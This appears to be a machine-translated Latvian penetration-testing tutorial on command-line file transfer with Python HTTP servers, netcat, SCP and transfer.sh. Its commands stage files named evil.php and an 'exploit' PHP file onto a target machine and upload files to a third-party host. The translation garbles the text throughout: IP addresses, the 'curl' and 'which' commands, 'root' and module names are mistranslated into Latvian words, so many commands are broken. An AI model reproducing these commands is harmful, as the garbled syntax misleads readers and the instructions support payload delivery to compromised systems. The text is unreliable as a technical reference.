Iekļūšanas testēšanas darbību laikā bieži ir nepieciešami varoņu, pitonu skriptu un ielādes moduļu pārsūtīšana. Tā kā terminālis ir galvenokārt izmantotais rīks, tas ir svarīgi, lai izprastu failu pārsūtīšanas pamatus.
Pildspalvu testerim jābūt labi aprīkotam ar dažādiem trikiem, lai pārsūtītu failus no attālā servera, kā arī no viena direktorija uz citu. Šajā apmācībā mēs apspriedīsim dažādus failu pārsūtīšanas veidus, izmantojot komandrindu.
1. Python serveris
Python ir pamata pakete, kas tiek iepriekš instalēta gandrīz visās Debian balstītajās sistēmās. Lai pārsūtītu failu no vienas mašīnas uz otru, rīkojieties šādi:
Python2:
Pārslēdzieties uz direktoriju, kurā atrodas pārsūtāmais fails. Sāciet vienkāršu pitona serveri. Ievadiet šādu komandu;
$ python -m SimpleHTTPServer 8080
Tagad dodieties uz mašīnu, kurā vēlaties pārsūtīt failu. Lai lejupielādētu failu, izmantojiet šo komandu;
$ wget http: // 192.168. lpp.43.177: 8080 / fails
Atcerieties nomainīt faila IP, porta numuru un nosaukumu.
Python3:
Viss, kas rakstīts python2, gandrīz vienmēr saplīsīs python3. Tāpēc mēs arī aplūkojam, kā pārsūtīt failu, izmantojot python3.
Python3 gadījumā ievadiet šādu komandu, lai palaistu vienkāršu pitona serveri.
$ python3 -m http.serveris 8080
Lai lejupielādētu failu mērķī, ievadiet šādu komandu;
$ wget http: // 192.168. lpp.43.177: 8080 / izmantot.php
2. Netcat
Netcat ir spēcīga utilīta failu pārsūtīšanai no jebkuras attālās mašīnas uz vietējo mašīnu. Tas ne vienmēr var tikt uzstādīts. Jūs varat pārbaudīt, vai tas pastāv, vai ne, ievadot;
$ kura netcat
Alternatīvi, ievadot;$ kura nc
Izveidojiet netcat serveri ar šādu komandu;
$ nc -nlvp 8080 < evil.php
Tagad dodieties uz mērķa mašīnu un ievadiet šo, lai lejupielādētu failu;
$ nc -nv 192.168. lpp.43.177 8080> ļaunums.php
Aizvietot nc
ar netcat
iepriekšminētajās komandās, ja nc nedarbojas vai nav pareizi instalēts.
3. SCP
Secure Copy Protocol ir spēcīgs rīks failu pārsūtīšanai. Tas ir noderīgi, it īpaši, ja vēlaties pārsūtīt direktorijus. To arī galvenokārt izmanto failu pārsūtīšanai, izmantojot ssh.
Lai pārsūtītu failu caur ssh, sūtīšanas mašīnā ievadiet šādu komandu;
$ scp -i jauns.pem tests.py ubuntu @ 18.220.68.229: / home / ubuntu
Kur -i apzīmē publisko atslēgu ssh pieteikšanās testam.py ir pārsūtāms fails, un / home / ubuntu ir mērķa direktorijs, kurā mēs vēlamies saglabāt failu.
Lai lejupielādētu failu no attālās mašīnas, ievadiet šādu komandu;
$ scp sakne @ 192.168. lpp.43.177: / remote_directory / file / local / directory
4. Pārskaitījums.sh
Failu pārsūtīšanai varat izmantot šo trešās puses rīku. Tas var būt noderīgi, ja jums nav mašīnas ar publisku IP un faili joprojām ir jāpārsūta. Šī komanda augšupielādē failu pārsūtīšanā.sh serveri;
$ curl --upload-file ./ fails.txt https: // pārsūtīšana.sh / fails.txt
Lai lejupielādētu failu, ievadiet šādu komandu;
$ čokurošanās https: // pārsūtīšana.sh // fails.txt -o fails.txt
Pārskaitījums.sh joprojām ir izstrādes stadijā un var nedarboties vienmēr.
Secinājums
Komandrindas rīki dod mums iespēju pārsūtīt failus dažādos veidos. Tie var šķist nedaudz sarežģīti, bet, tos apgūstot, tiek nodrošināta iespēja viegli pārvaldīt failus, it īpaši, ja nav pieejama GUI opcija.